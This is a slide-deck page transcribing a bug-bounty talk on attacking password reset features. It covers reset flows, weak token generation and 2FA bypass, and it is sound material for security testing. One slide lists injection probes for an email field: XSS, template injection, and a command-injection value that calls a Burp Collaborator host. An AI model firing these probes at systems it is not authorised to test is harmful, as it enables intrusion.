Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Abusing Password Reset Functionality

Tuhin Bose
September 18, 2021

Abusing Password Reset Functionality

Tuhin Bose

September 18, 2021
Tweet

More Decks by Tuhin Bose

Other Decks in Technology

Transcript

  1. root@kali:~#whoami Bug Bounty Hunter CISO at Damn Secure Pentesting Hub

    Crowdsource Security Researcher at Detectify B. Tech in Cyber Security and Digital Forensics Ethically hacked and secured Google, National Cyber Security Center (Netherlands), NCIIPC, ISC2 (Top 25), Unilever (Top 25), Mastercard, Dell, Pinterest, SpaceX(Top 3) and many other programs
  2. Conclusion & QNA What is Password Reset? Common Password Reset

    Implementation in Web Application Hacking Password Reset Feature AGENDA Flows of Password Reset
  3. If an application has a login feature then there should

    be a password reset feature. In order to implement a proper user management system, developers must implement a password reset feature. It allows the users to reset their accounts' password.
  4. Flow of Password Reset User entered his username/email. Server send

    a password reset link to the user. User open the password reset link and enter the new password. Password changed.
  5. 4. Weak Encryption Sometimes developers uses weak encryption algorithms while

    generating password reset tokens. For example, sometimes they just encrypt the user id of user + timestrap using some weak encryption algorithms.
  6. 14. If they are sending an otp for password reset,

    try 2fa bypass techniques. https://twitter.com/tuhin1729_/status/141481305505408 6152
  7. 18. Try XSS, SSTI, Command Injection etc in the email

    field. hello+(<script>alert(1)</script>)@gmail.com "<%= 7 * 7 %>"@gmail.com hello+(${{7*7}})@gmail.com hello@`whoami`.xyz.burpcollaborator.net